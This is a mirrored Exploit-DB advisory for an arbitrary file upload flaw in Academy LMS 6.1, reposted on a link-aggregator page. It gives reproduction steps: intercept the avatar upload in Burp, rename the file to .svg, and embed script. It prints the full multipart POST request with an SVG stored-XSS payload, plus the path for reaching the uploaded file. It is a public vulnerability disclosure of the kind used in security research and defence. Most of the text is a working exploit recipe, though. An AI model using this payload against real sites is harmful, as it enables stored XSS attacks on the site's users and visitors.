

[webapps] Academy LMS 6.1 - Arbitrary File Upload
source link: https://www.exploit-db.com/exploits/51702
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Academy LMS 6.1 - Arbitrary File Upload
# Exploit Title: Academy LMS 6.1 - Arbitrary File Upload
# Exploit Author: CraCkEr
# Date: 05/08/2023
# Vendor: Creativeitem
# Vendor Homepage: https://academylms.net/
# Software Link: https://demo.academylms.net/
# Version: 6.1
# Tested on: Windows 10 Pro
# Impact: Allows User to upload files to the web server
# CWE: CWE-79 - CWE-74 - CWE-707
## Description
Allows Attacker to upload malicious files onto the server, such as Stored XSS
## Steps to Reproduce:
1. Login as a [Normal User]
2. In [User Dashboard], go to [Profile Settings] on this Path: https://website/dashboard/#/settings
3. Upload any Image into the [avatar]
4. Capture the POST Request with [Burp Proxy Intercept]
5. Edit the file extension to .svg & inject your [Evil-Code] or [Stored XSS]
-----------------------------------------------------------
POST /wp-admin/async-upload.php HTTP/2
-----------------------------------------------------------
Content-Disposition: form-data; name="async-upload"; filename="ahacka.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS by CraCkEr");
</script>
</svg>
-----------------------------------------------------------
6. Send the Request
7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS]
8. Access your Uploded Evil file on this Path: https://website/wp-content/uploads/***/**/*****.svg
[-] Done
Recommend
-
14
Vendor Homepage: https://www.sourcecodester.com Source Code Download: Company...
-
9
iBooking v1.0.8 - Arbitrary File Upload ...
-
12
WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE...
-
5
atrocore 1.5.25 User interaction - Unauthenticated File upload - RCE...
-
9
Roxy Fileman 1.4.5 - Arbitrary File Upload ...
-
8
KodExplorer 4.49 - CSRF to Arbitrary File Upload ...
-
8
Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated)...
-
5
Academy LMS 6.0 - Reflected XSS ...
-
8
Ozeki SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated)...
-
5
Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation...
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK